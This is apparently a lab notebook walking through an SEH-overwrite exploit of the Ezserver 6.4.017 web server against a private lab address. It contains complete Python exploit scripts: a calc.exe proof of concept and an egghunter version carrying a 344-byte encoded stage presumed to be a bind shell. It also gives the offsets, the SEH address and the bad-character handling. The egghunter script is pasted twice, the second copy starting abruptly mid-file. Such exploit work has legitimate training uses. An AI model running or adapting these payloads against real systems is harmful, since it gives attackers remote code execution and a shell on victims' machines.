Let's continue the job (observing Ezserver 6.4.017):
Yesterday I tried to load the full payload, but the application crashed and the telnet test did not connect. Why? Check the memory dump, but first change the fuzzer to send a generated byte sequence 01-FF (generatedcode.pl) so the point where the copy stops becomes visible; the standard bad characters for an HTTP request line are 00 0a 0d:
==> Run the fuzzer and follow the dump in OllyDbg
**See: the sequence is only complete up to 0xF4, so the space after the overwritten SEH record is too small for the full payload.
**Use calc shellcode to verify that the fuzzer works at all (it needs only about 160 bytes of space).
**Use an egghunter to work around the space problem.
==> Calc shellcode ==> runs a Windows command (pops calc.exe); used only to prove code execution
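#!/usr/bin/python
"""Ezserver 6.4.017 SEH overwrite -- calc.exe proof of concept.

Layout of the request path (offsets relative to the start of ``buff``):

    [NOP sled 5879][nSEH: jmp short +6][SEH: 0x10209696][calc shellcode 161]

The jump at nSEH skips its own two pad bytes and the 4-byte SEH address, so
execution lands on the first byte of the shellcode.  Bad characters avoided:
0x00 0x0a 0x0d (from the generatedcode run above).

Written to run unchanged under Python 2 and 3: every payload piece is a
``bytes`` literal, so no implicit text encoding can alter it on the wire.
"""
import socket

target_address = "192.168.56.101"
target_port = 8000

# Offset of the next-SEH pointer inside the path, found with the pattern run
# and confirmed in the OllyDbg dump.
NSEH_OFFSET = 5879

# \xeb\x06 = JMP SHORT +6 (relative to the end of the 2-byte instruction):
# skips the two \x90 pad bytes and the 4-byte SEH address that follows.
NSEH = b"\xeb\x06\x90\x90"

# 0x10209696 little-endian, the "dll address" from the notes.  Presumably a
# POP/POP/RET in a module without SafeSEH -- verify in the debugger before
# reusing it on another build of Ezserver.
SEH = b"\x96\x96\x20\x10"

# 161-byte calc shellcode.  Appears to be encoder output (the
# \xd9\x74\x24\xf4 fnstenv GetPC stub is the usual sign); the whole blob
# must be free of bad characters or the copy is truncated.
shellcode = (b"\xba\xc9\x72\x97\x98\xda\xd8\x2b\xc9\xd9\x74\x24\xf4\x5b\xb1\x23"
             b"\x83\xc3\x04\x31\x53\x0e\x03\x9a\x7c\x75\x6d\xe0\x69\x3d\x8e\x18"
             b"\x6a\x35\xcb\x24\xe1\x35\xd1\x2c\xf4\x2a\x52\x83\xee\x3f\x3a\x3b"
             b"\x0e\xab\x8c\xb0\x24\xa0\x0e\x28\x75\x76\x89\x18\xf2\xb6\xde\x67"
             b"\x3a\xfc\x12\x66\x7e\xea\xd9\x53\x2a\xc9\x25\xd6\x37\x9a\x79\x3c"
             b"\xb9\x76\xe3\xb7\xb5\xc3\x67\x98\xd9\xd2\x9c\xad\xfe\x5f\x63\x5a"
             b"\x77\x03\x40\x98\x4b\x8d\x48\xc4\xc0\xae\x78\x81\x17\x56\x75\x02"
             b"\xd7\xab\x0e\x64\xc4\x1e\x9b\xec\xfc\x8b\x95\x67\x7c\xfb\xa6\x77"
             b"\x7d\x77\xce\x4b\x22\xb6\xf9\xd3\x8a\x31\xfd\x90\xf3\x39\xae\xfe"
             b"\x8d\x65\xac\x8d\x19\x0e\xcf\xfb\xd4\x79\xcf\x1c\x8b\xe4\x43\x81"
             b"\x4c")

# Bytes the request path cannot carry: NUL and the request-line terminators.
BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")


def check_bad_chars(data):
    """Raise ValueError if *data* contains a byte the server truncates on.

    A bad byte inside the sled or shellcode silently cuts the copy short,
    which is exactly the failure mode debugged above, so fail before sending.
    """
    for bad in BAD_CHARS:
        if bad in data:
            raise ValueError("payload contains bad char %r" % bad)


def build_buff():
    """Return the exploit buffer (bytes): sled + nSEH + SEH + shellcode."""
    return b"\x90" * NSEH_OFFSET + NSEH + SEH + shellcode


def build_payload(buff):
    """Wrap *buff* in the request the original PoC sent.

    The request is deliberately malformed (the HTTP version comes after the
    blank line); it is what triggered the crash, so it is kept byte-for-byte.
    """
    return b"GET /" + buff + b"\r\n\r\n" + b"HTTP/1.1"


def main():
    """Build the buffer, check it for bad chars and send it to the target."""
    buff = build_buff()
    check_bad_chars(buff)
    payload = build_payload(buff)
    # A timeout so the script does not hang forever when the service is
    # already dead from a previous crash.
    sock = socket.create_connection((target_address, target_port), 10)
    try:
        print("Junk sent........")
        # sendall: send() may write only part of a ~6 KB buffer, which would
        # look like a truncated payload in the debugger.
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    main()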
==> Run the calc fuzzer.
** calc.exe executes and its window appears on the target
==> Scenario for the egghunter fuzzer:
*** (nops + "w00tw00t" + shellcode + nops) + jump short + dll address (the SEH handler overwrite) + egghunter
The total length of the first part must equal the offset at which the handler was overwritten (5879 bytes, the same as in the calc fuzzer), so nSEH/SEH land in the same place as before.
egghunter: ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # 32 bytes; 32-bit Windows only (probes pages via the int 0x2e system call), searches for the 4-byte tag "w00t" twice in a row
The egghunter scans memory for the tag "w00tw00t" and then jumps to the shellcode placed directly after it.
==> Create the fuzzer following the scenario above.
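#!/usr/bin/python
"""Ezserver 6.4.017 SEH overwrite with an egghunter.

The stage did not fit in the space after the SEH record, so it is placed in
front of the record, tagged with an egg, and a 32-byte hunter is put where
the calc shellcode used to be.  Layout of the request path (offsets relative
to the start of ``buff``):

    [NOP sled][egg "w00tw00t"][shellcode 344][NOP 32]      <- 5879 bytes
    [nSEH: jmp short +6][SEH: 0x10209696][NOP 16][egghunter 32]

The jump at nSEH skips the SEH address, slides through the NOPs into the
hunter, and the hunter jumps to the shellcode right behind the egg.
Bad characters avoided: 0x00 0x0a 0x0d.

Written to run unchanged under Python 2 and 3: every payload piece is a
``bytes`` literal, so no implicit text encoding can alter it on the wire.
"""
import socket

target_address = "192.168.56.101"
target_port = 8000

# Offset of the next-SEH pointer inside the path (same as the calc PoC).
NSEH_OFFSET = 5879

# Tag the hunter looks for; the shellcode follows it immediately.
EGG = b"w00tw00t"

# Padding after the stage and before the hunter (as in the original layout).
POST_STAGE_NOPS = 32
PRE_HUNT_NOPS = 16

# \xeb\x06 = JMP SHORT +6: skips the two pad bytes and the 4-byte SEH address.
NSEH = b"\xeb\x06\x90\x90"

# 0x10209696 little-endian, the "dll address" from the notes.  Presumably a
# POP/POP/RET in a module without SafeSEH -- verify in the debugger before
# reusing it on another build of Ezserver.
SEH = b"\x96\x96\x20\x10"

# 32-byte egghunter.  Reading the bytes: or dx,0x0fff / inc edx walks memory
# a page at a time; push 2 / pop eax / int 0x2e probes the page through a
# system call so an unmapped page does not fault; mov eax,0x74303077 ("w00t")
# then scasd twice checks for the tag "w00tw00t"; jmp edi enters the stage.
# NOTE(review): the int 0x2e path and the fixed syscall number tie this to
# 32-bit Windows builds -- confirm on the target OS before reuse.
hunt = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
        b"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
        b"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
        b"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# 344-byte stage (presumably the bind shell the telnet test above targets --
# confirm).  Appears to be encoder output (\xd9\x74\x24\xf4 fnstenv GetPC
# stub); it must contain none of the bad characters.
shellcode = (b"\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
             b"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
             b"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
             b"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
             b"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
             b"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
             b"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
             b"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
             b"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
             b"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
             b"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
             b"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
             b"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
             b"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
             b"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
             b"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
             b"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
             b"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
             b"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
             b"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
             b"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
             b"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")

# Bytes the request path cannot carry: NUL and the request-line terminators.
BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")


def check_bad_chars(data):
    """Raise ValueError if *data* contains a byte the server truncates on.

    A bad byte anywhere in the buffer silently cuts the copy short, which is
    exactly the failure mode debugged above, so fail before sending.
    """
    for bad in BAD_CHARS:
        if bad in data:
            raise ValueError("payload contains bad char %r" % bad)


def build_buff():
    """Return the exploit buffer (bytes) with nSEH exactly at NSEH_OFFSET.

    The sled length is derived from the stage size so that swapping in a
    different shellcode keeps the SEH records aligned; with the 344-byte
    stage above it comes out as the original 5495 bytes.

    Raises ValueError if egg + stage + padding no longer fit before nSEH.
    """
    sled_len = NSEH_OFFSET - len(EGG) - len(shellcode) - POST_STAGE_NOPS
    if sled_len < 0:
        raise ValueError("shellcode too large by %d bytes" % -sled_len)
    front = b"\x90" * sled_len + EGG + shellcode + b"\x90" * POST_STAGE_NOPS
    return front + NSEH + SEH + b"\x90" * PRE_HUNT_NOPS + hunt


def build_payload(buff):
    """Wrap *buff* in the request the original PoC sent.

    The request is deliberately malformed (the HTTP version comes after the
    blank line); it is what triggered the crash, so it is kept byte-for-byte.
    """
    return b"GET /" + buff + b"\r\n\r\n" + b"HTTP/1.1"


def main():
    """Build the buffer, check it for bad chars and send it to the target."""
    buff = build_buff()
    check_bad_chars(buff)
    payload = build_payload(buff)
    # A timeout so the script does not hang forever when the service is
    # already dead from a previous crash.
    sock = socket.create_connection((target_address, target_port), 10)
    try:
        print("Junk sent........")
        # sendall: send() may write only part of a ~6 KB buffer, which would
        # look like a truncated payload in the debugger.
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    main()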
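"""Ezserver 6.4.017 SEH overwrite with an egghunter.

The stage did not fit in the space after the SEH record, so it is placed in
front of the record, tagged with an egg, and a 32-byte hunter is put where
the calc shellcode used to be.  Layout of the request path (offsets relative
to the start of ``buff``):

    [NOP sled][egg "w00tw00t"][shellcode 344][NOP 32]      <- 5879 bytes
    [nSEH: jmp short +6][SEH: 0x10209696][NOP 16][egghunter 32]

The jump at nSEH skips the SEH address, slides through the NOPs into the
hunter, and the hunter jumps to the shellcode right behind the egg.
Bad characters avoided: 0x00 0x0a 0x0d.

Written to run unchanged under Python 2 and 3: every payload piece is a
``bytes`` literal, so no implicit text encoding can alter it on the wire.
"""
import socket

target_address = "192.168.56.101"
target_port = 8000

# Offset of the next-SEH pointer inside the path (same as the calc PoC).
NSEH_OFFSET = 5879

# Tag the hunter looks for; the shellcode follows it immediately.
EGG = b"w00tw00t"

# Padding after the stage and before the hunter (as in the original layout).
POST_STAGE_NOPS = 32
PRE_HUNT_NOPS = 16

# \xeb\x06 = JMP SHORT +6: skips the two pad bytes and the 4-byte SEH address.
NSEH = b"\xeb\x06\x90\x90"

# 0x10209696 little-endian, the "dll address" from the notes.  Presumably a
# POP/POP/RET in a module without SafeSEH -- verify in the debugger before
# reusing it on another build of Ezserver.
SEH = b"\x96\x96\x20\x10"

# 32-byte egghunter.  Reading the bytes: or dx,0x0fff / inc edx walks memory
# a page at a time; push 2 / pop eax / int 0x2e probes the page through a
# system call so an unmapped page does not fault; mov eax,0x74303077 ("w00t")
# then scasd twice checks for the tag "w00tw00t"; jmp edi enters the stage.
# NOTE(review): the int 0x2e path and the fixed syscall number tie this to
# 32-bit Windows builds -- confirm on the target OS before reuse.
hunt = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
        b"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
        b"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
        b"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# 344-byte stage (presumably the bind shell the telnet test above targets --
# confirm).  Appears to be encoder output (\xd9\x74\x24\xf4 fnstenv GetPC
# stub); it must contain none of the bad characters.
shellcode = (b"\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
             b"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
             b"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
             b"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
             b"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
             b"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
             b"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
             b"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
             b"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
             b"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
             b"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
             b"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
             b"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
             b"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
             b"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
             b"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
             b"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
             b"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
             b"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
             b"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
             b"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
             b"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")

# Bytes the request path cannot carry: NUL and the request-line terminators.
BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")


def check_bad_chars(data):
    """Raise ValueError if *data* contains a byte the server truncates on.

    A bad byte anywhere in the buffer silently cuts the copy short, which is
    exactly the failure mode debugged above, so fail before sending.
    """
    for bad in BAD_CHARS:
        if bad in data:
            raise ValueError("payload contains bad char %r" % bad)


def build_buff():
    """Return the exploit buffer (bytes) with nSEH exactly at NSEH_OFFSET.

    The sled length is derived from the stage size so that swapping in a
    different shellcode keeps the SEH records aligned; with the 344-byte
    stage above it comes out as the original 5495 bytes.

    Raises ValueError if egg + stage + padding no longer fit before nSEH.
    """
    sled_len = NSEH_OFFSET - len(EGG) - len(shellcode) - POST_STAGE_NOPS
    if sled_len < 0:
        raise ValueError("shellcode too large by %d bytes" % -sled_len)
    front = b"\x90" * sled_len + EGG + shellcode + b"\x90" * POST_STAGE_NOPS
    return front + NSEH + SEH + b"\x90" * PRE_HUNT_NOPS + hunt


def build_payload(buff):
    """Wrap *buff* in the request the original PoC sent.

    The request is deliberately malformed (the HTTP version comes after the
    blank line); it is what triggered the crash, so it is kept byte-for-byte.
    """
    return b"GET /" + buff + b"\r\n\r\n" + b"HTTP/1.1"


def main():
    """Build the buffer, check it for bad chars and send it to the target."""
    buff = build_buff()
    check_bad_chars(buff)
    payload = build_payload(buff)
    # A timeout so the script does not hang forever when the service is
    # already dead from a previous crash.
    sock = socket.create_connection((target_address, target_port), 10)
    try:
        print("Junk sent........")
        # sendall: send() may write only part of a ~6 KB buffer, which would
        # look like a truncated payload in the debugger.
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    main()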
==> Run the fuzzer and check the result (the egghunter may take several seconds to reach the egg; watch the process in OllyDbg if nothing happens).
===================================================================================
===================================================================================
===================================================================================